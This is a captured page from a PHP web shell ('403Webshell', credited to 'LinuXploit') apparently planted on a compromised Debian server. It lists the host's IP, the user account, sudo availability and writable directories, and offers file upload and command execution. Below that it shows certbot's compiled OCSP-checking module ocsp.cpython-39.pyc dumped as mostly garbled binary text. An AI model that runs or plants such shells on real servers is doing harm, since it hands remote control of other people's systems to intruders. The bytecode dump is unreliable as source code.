403Webshell
Server IP : 35.236.43.222  /  Your IP : 216.73.216.143
Web Server : Apache
System : Linux order-form-vm-001 5.10.0-37-cloud-amd64 #1 SMP Debian 5.10.247-1 (2025-12-11) x86_64
User : deploy ( 1002)
PHP Version : 8.1.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/certbot/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3/dist-packages/certbot/__pycache__/ocsp.cpython-39.pyc
a

�`�:�	@spdZddlmZddlmZddlZddlZddlmZddlmZddlm	Z	ddl
mZdd	l
mZdd
l
mZddlmZddlmZddlZddlZdd
lmZddlmZddlmZddlmZddlmZddlmZddlmZzddlm Z e!e j"d�Wne#e$f�y(dZ Yn0e�%e&�Z'Gdd�de(�Z)dd�Z*dd�Z+dd�Z,dd�Z-d d!�Z.dS)"z*Tools for checking certificate revocation.�)�datetime)�	timedeltaN)�PIPE)�Popen)�x509)�InvalidSignature)�UnsupportedAlgorithm)�default_backend)�hashes)�
serialization)�Optional)�Tuple)�crypto_util)�errors)�util)�getenv)�
RenewableCert)�ocsp�signature_hash_algorithmc@s4eZdZdZd
dd�Zdd�Zddd	�Zd
d�ZdS)�RevocationCheckerzEThis class figures out OCSP checking on this system, and performs it.FcCs~d|_|pt|_|jrzt�d�s6t�d�d|_dStgd�ttdt�	�d�}|�
�\}}d|vrpdd	�|_n
d
d	�|_dS)NF�opensslz-openssl not installed, can't check revocationT)rr�-header�var�val)�stdout�stderrZuniversal_newlines�envz	Missing =cSs
d|gS)NzHost=���hostrr�./usr/lib/python3/dist-packages/certbot/ocsp.py�<lambda>:�z,RevocationChecker.__init__.<locals>.<lambda>cSsd|gS)NZHostrrrrr r!<r")�brokenr�use_openssl_binaryrZ
exe_exists�logger�inforrZenv_no_snap_for_external_callsZcommunicate�	host_args)�selfZenforce_openssl_binary_usageZtest_host_formatZ_out�errrrr �__init__*s

�zRevocationChecker.__init__cCs|�|j|j�S)a Get revoked status for a particular cert version.

        .. todo:: Make this a non-blocking call

        :param `.interfaces.RenewableCert` cert: Certificate object
        :returns: True if revoked; False if valid or the check failed or cert is expired.
        :rtype: bool

        )�ocsp_revoked_by_paths�	cert_path�
chain_path)r(�certrrr �ocsp_revoked>szRevocationChecker.ocsp_revoked�
cCsj|jr
dStj�t���}t�|�|kr,dSt|�\}}|r@|sDdS|j	r\|�
|||||�St||||�S)aEPerforms the OCSP revocation check

        :param str cert_path: Certificate filepath
        :param str chain_path: Certificate chain
        :param int timeout: Timeout (in seconds) for the OCSP query

        :returns: True if revoked; False if valid or the check failed or cert is expired.
        :rtype: bool

        F)r#�pytzZUTCZfromutcr�utcnowrZnotAfter�_determine_ocsp_serverr$�_check_ocsp_openssl_bin�_check_ocsp_cryptography)r(r,r-�timeout�now�urlrrrr r+Ksz'RevocationChecker.ocsp_revoked_by_pathsc
Cstd�}td�}d}|dus$|dur4|dur0|n|}|durFd|g}	n&|�d�r`|td�d�}d|d|g}	ddd	d
|d|d|d
|ddt|�dg|�|�|	}
t�d|�t�d�|
��ztj	|
tjd�\}}Wn"t
jy�t�d|�YdS0t
|||�S)NZ
http_proxyZ
HTTP_PROXYz-urlzhttp://z-hostz-pathrrz	-no_noncez-issuerz-certz-CAfilez
-verify_otherz-trust_otherz-timeoutrzQuerying OCSP for %s� )�log�*OCSP check failed for %s (are we offline?)F)r�
startswith�len�strr'r%�debug�joinrZ
run_scriptrZSubprocessErrorr&�_translate_ocsp_query)
r(r,r-rr8r6Zenv_http_proxyZenv_HTTP_PROXYZ
proxy_hostZurl_opts�cmd�outputr)rrr r4is@

���	z)RevocationChecker._check_ocsp_openssl_binN)F)r0)�__name__�
__module__�__qualname__�__doc__r*r/r+r4rrrr r's


rc	s�t|d��"}t�|��t��}Wd�n1s20Yz:|j�tj�}tjj	��fdd�|j
D�}|djj
}Wn&tjt
fy�t�d|�YdS0|��}|�d�d	�d
�}|r�||fSt�d||�dS)z�Extract the OCSP server host from a certificate.

    :param str cert_path: Path to the cert we're checking OCSP for
    :rtype tuple:
    :returns: (OCSP server URL or None, OCSP server host or None)

    �rbNcsg|]}|j�kr|�qSr)Z
access_method)�.0Zdescription�Zocsp_oidrr �
<listcomp>�s
�z*_determine_ocsp_server.<locals>.<listcomp>rzCannot extract OCSP URI from %s)NNz://��/z;Cannot process OCSP host from URL (%s) in certificate at %s)�openr�load_pem_x509_certificate�readr	�
extensions�get_extension_for_classZAuthorityInformationAccessZAuthorityInformationAccessOIDZOCSP�valueZaccess_location�ExtensionNotFound�
IndexErrorr%r&�rstrip�	partition)r,�file_handlerr.�	extensionZdescriptionsr8rrrJr r3�s 	0r3c
Cs.t|d��"}t�|��t��}Wd�n1s20Yt|d��"}t�|��t��}Wd�n1sn0Yt��}|�||t�	��}|�
�}|�tj
j�}	ztj||	ddi|d�}
Wn(tjjy�tjd|dd�YdS0|
jd	k�rt�d
||
j�dSt�|
j�}|jtjjk�r<t�d||j�dSzt||||�Wn�t�y�}zt�t|��WYd}~n�d}~0tj �y�}zt�t|��WYd}~n|d}~0t!�y�t�d|�YnVt"�y
}
zt�d
|t|
��WYd}
~
n(d}
~
00t�#d||j$�|j$tj%j&kSdS)NrHzContent-Typezapplication/ocsp-request)�dataZheadersr6r;T)�exc_infoF��z*OCSP check failed for %s (HTTP status: %d)z'Invalid OCSP response status for %s: %sz)Invalid signature on OCSP response for %sz!Invalid OCSP response for %s: %s.z%OCSP certificate status for %s is: %s)'rNrrOrPr	rZOCSPRequestBuilderZadd_certificater
ZSHA1ZbuildZpublic_bytesrZEncodingZDER�requestsZpost�
exceptionsZRequestExceptionr%r&Zstatus_codeZload_der_ocsp_responseZcontentZresponse_statusZOCSPResponseStatusZ
SUCCESSFUL�error�_check_ocsp_responserr>r�Errorr�AssertionErrorr?Zcertificate_statusZOCSPCertStatusZREVOKED)r,r-r8r6rX�issuerr.ZbuilderZrequestZrequest_binaryZresponse�
response_ocsp�er_rrr r5�sP00�
�""(�r5cCs�|j|jkrtd��t|||�t|jt|j��rJ|j|jksJ|j|jkrRtd��t�	�}|j
shtd��|j
|tdd�kr�td��|jr�|j|tdd�kr�td��dS)	z2Verify that the OCSP is valid for several criteriazMthe certificate in response does not correspond to the certificate in requestz<the issuer does not correspond to issuer of the certificate.zparam thisUpdate is not set.�)Zminutesz"param thisUpdate is in the future.z param nextUpdate is in the past.N)
Z
serial_numberrb�_check_ocsp_response_signature�
isinstanceZhash_algorithm�typeZissuer_key_hashZissuer_name_hashrr2Zthis_updaterZnext_update)rdZrequest_ocsp�issuer_certr,r7rrr r`�s 
�
�r`c	s
dd���j|jks"�j�|�kr4t�d|�|}n�t�d|���fdd��jD�}|sbtd��|d}|j|jkr~td	��z"|j�	t
j�}t
jj
j|jv}Wnt
jtfy�d
}Yn0|s�td��|j}t�|��|j|j|��j}t�|���j�j|�dS)
zIVerify an OCSP response signature against certificate issuer or respondercSstj�|���jS)N)rZSubjectKeyIdentifierZfrom_public_key�
public_keyZdigest)r.rrr �	_key_hashsz1_check_ocsp_response_signature.<locals>._key_hashzGOCSP response for certificate %s is signed by the certificate's issuer.zGOCSP response for certificate %s is delegated to an external responder.cs*g|]"}�j|jks"�j�|�kr|�qSr)�responder_name�subject�responder_key_hash)rIr.�rlrdrr rKs�z2_check_ocsp_response_signature.<locals>.<listcomp>z0no matching responder certificate could be foundrz?responder certificate is not signed by the certificate's issuerFz<responder is not authorized by issuer to sign OCSP responsesN)rmrnror%r?ZcertificatesrbrcrQrRrZExtendedKeyUsageZoidZExtendedKeyUsageOIDZOCSP_SIGNINGrSrTrUrrZverify_signed_payloadrkZ	signatureZtbs_certificate_bytesZtbs_response_bytes)rdrjr,Zresponder_certZresponder_certsrYZdelegate_authorizedZchosen_hashrrpr rgs@���
��rgc	s�d}�fdd�|D�}�fdd�|D�\}}}|r<|�d�nd}d|vsT|rP|sT|rrt�d	��t�d
�|�dS|r~|s~dS|r�|�d�}|r�t�d|�d
St�d�|�dSdS)z7Parse openssl's weird output to work out what it means.)�good�revoked�unknowncsg|]}d��|��qS)z{0}: (WARNING.*)?{1})�format)rI�s)r,rr rK<r"z)_translate_ocsp_query.<locals>.<listcomp>c3s |]}tj|�tjd�VqdS))�flagsN)�re�search�DOTALL)rI�p)�ocsp_outputrr �	<genexpr>=r"z(_translate_ocsp_query.<locals>.<genexpr>�NzResponse verify OKz#Revocation status for %s is unknownzUncertain output:
%s
stderr:
%sFzOCSP revocation warning: %sTz2Unable to properly parse OCSP output: %s
stderr:%s)�groupr%r&r?�warning)	r,r{Zocsp_errorsZstatesZpatternsrqrrrsrr)r,r{r rA8s&
�rA)/rGrrZloggingrw�
subprocessrrZcryptographyrZcryptography.exceptionsrrZcryptography.hazmat.backendsr	Zcryptography.hazmat.primitivesr
rr1r]Zacme.magic_typingrr
ZcertbotrrrZcertbot.compat.osrZcertbot.interfacesrZcryptography.x509r�getattrZOCSPResponse�ImportError�AttributeErrorZ	getLoggerrDr%�objectrr3r5r`rgrArrrr �<module>sB

h2"6

Youez - 2016 - github.com/yon3zu
LinuXploit